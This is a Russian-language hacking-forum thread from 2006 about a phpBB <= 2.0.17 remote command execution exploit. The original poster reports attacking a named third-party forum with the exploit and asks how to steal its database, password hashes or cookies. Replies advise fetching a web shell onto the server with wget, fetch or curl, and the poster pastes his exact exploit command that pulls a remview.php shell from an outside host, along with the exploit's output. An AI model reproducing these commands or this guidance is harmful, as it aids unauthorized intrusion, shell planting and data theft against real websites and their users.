HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
   
Закрытая тема
 
Опции темы Поиск в этой теме Опции просмотра

phpBB <= 2.0.17
  #1  
Старый 17.05.2006, 16:15
Dimazzz
Участник форума
Регистрация: 23.11.2005
Сообщений: 179
С нами: 10770849

Репутация: 23
По умолчанию phpBB <= 2.0.17

phpBB <= 2.0.17
Цель: выполнение произвольных команд на сервере(php-inj)
Описание уязвимости: В данной версии присутствует уязвимость в модуле profile.php.
Exploit: http://rst.void.ru/download/r57phpbb2017.txt Запускать "perl exp.pl <URL> <cmd>"


Я использовал эту уязвимость на форуме http://www.abbadon.ru/f/ вроде все получилось.
У меня вопрос можно ли какой нить командой узнать хеш пользователя, или слить базу, и возможно еще залить shell? объясните плиз.
 

  #2  
Старый 17.05.2006, 17:37
ShAnKaR
Постоянный
Регистрация: 14.07.2005
Сообщений: 964
С нами: 10960226

Репутация: 1424


По умолчанию

так этож уязвимость представляет собой php injection
так что базу слить канечно можно в любом случае, вот шел записать только если прав хватит, логично?
не в тему но всеже скажу
хреновый канечно у нас FAQ по phpbb чисто реклама рст, ни какой информативности мля
кстати еще от себя скажу что странно вроде там php 5.1 а GLOBALS через GET всеравно работает.
 

  #3  
Старый 17.05.2006, 17:47
Dimazzz
Участник форума
Регистрация: 23.11.2005
Сообщений: 179
С нами: 10770849

Репутация: 23
По умолчанию

какой командой можно базу слить?
или шел залить

может я просто не так делаю не ругайтесь


C:\Perl\bin>r57phpbb2017.pl http://www.abbadon.ru/f/ тут_команда

или это делается пл другому?
 

  #4  
Старый 17.05.2006, 17:51
EST a1ien
Участник форума
Регистрация: 02.04.2006
Сообщений: 273
С нами: 10582516

Репутация: 114
По умолчанию

А команда простая wget http://путь_к шелу.
И он зальётся.
 

  #5  
Старый 17.05.2006, 18:03
Dimazzz
Участник форума
Регистрация: 23.11.2005
Сообщений: 179
С нами: 10770849

Репутация: 23
По умолчанию

C:\Perl\bin>r57phpbb2017.pl http://www.abbadon.ru/f/ wget http://probnii.newmail
.ru/remview.php
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~
PhpBB <= 2.0.17, PHP 5 < 5.0.5 remote command execution exploit by RST/GHC
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~
Done. User 234558372 successfully registered!

и дальше вылетает непонятный большой код как будто главной страници
может что я сто то неправильно делаю

захожу в командную строку.
иду к папке с перлом и от туда запускаю сплоит.
и дальше C:\Perl\bin>r57phpbb2017.pl http://www.abbadon.ru/f/ команда

чет неполучается ;( сайт http://www.abbadon.ru/f/
 

  #6  
Старый 17.05.2006, 18:07
ShAnKaR
Постоянный
Регистрация: 14.07.2005
Сообщений: 964
С нами: 10960226

Репутация: 1424


По умолчанию

попробуй без сплоита делать тогда быстрее во всем разберешся
 

  #7  
Старый 17.05.2006, 18:09
Dimazzz
Участник форума
Регистрация: 23.11.2005
Сообщений: 179
С нами: 10770849

Репутация: 23
По умолчанию

Цитата:
Сообщение от ShAnKaR  
попробуй без сплоита делать тогда быстрее во всем разберешся
какким образом ? объясни пожалуйста. Мне просто у этого форума куки нужно выдрать или базу. Вобщем получить достут можно даже без админки.
 

  #8  
Старый 17.05.2006, 18:16
nytros
Новичок
Регистрация: 05.01.2006
Сообщений: 29
С нами: 10707720

Репутация: 0
По умолчанию

Цитата:
Сообщение от Dimazzz  
C:\Perl\bin>r57phpbb2017.pl http://www.abbadon.ru/f/ wget http://probnii.newmail
.ru/remview.php
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~
PhpBB <= 2.0.17, PHP 5 < 5.0.5 remote command execution exploit by RST/GHC
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~
Done. User 234558372 successfully registered!

и дальше вылетает непонятный большой код как будто главной страници
может что я сто то неправильно делаю

захожу в командную строку.
иду к папке с перлом и от туда запускаю сплоит.
и дальше C:\Perl\bin>r57phpbb2017.pl http://www.abbadon.ru/f/ команда

чет неполучается ;( сайт http://www.abbadon.ru/f/

А может там wget нету а чтото другое и шел не залился.Попробуй вместо wget fetch ili curl вставить.
 

  #9  
Старый 17.05.2006, 18:27
ShAnKaR
Постоянный
Регистрация: 14.07.2005
Сообщений: 964
С нами: 10960226

Репутация: 1424


По умолчанию

вот здесь
http://www.hardened-php.net/advisory_172005.75.html
первое описание баги челом который её нашел, к томуже подскажу что вся фишка в файле
includes/usercp_register.php

Последний раз редактировалось ShAnKaR; 17.05.2006 в 18:41..
 

  #10  
Старый 17.05.2006, 18:27
Dimazzz
Участник форума
Регистрация: 23.11.2005
Сообщений: 179
С нами: 10770849

Репутация: 23
По умолчанию

эффект тот же ни чего не происходит как будто что то не так делаю
 
Закрытая тема



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
phpBB <= 2.0.19 XSS Remote Cookie Disclosure Exploit Rebz Уязвимости 4 28.02.2006 19:45
phpBB <= 2.0.18 Remote Dictionary Attack Tool D1mOn Уязвимости CMS / форумов 5 31.01.2006 19:54
phpBB 2.0.17 "Cross Site Scripting" néM3S!s Forum for discussion of ANTICHAT 1 23.01.2006 02:04
NEW Exploits PhpBB <= 2.0.17 karapuz Уязвимости CMS / форумов 3 18.01.2006 01:12
Проникаем в phpBB 2.0.17 kitiaCaT Уязвимости CMS / форумов 5 18.10.2005 23:37



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка


Загрузка чата...
×

ESCROW ADMIN PANEL

Загрузка...
Загрузка...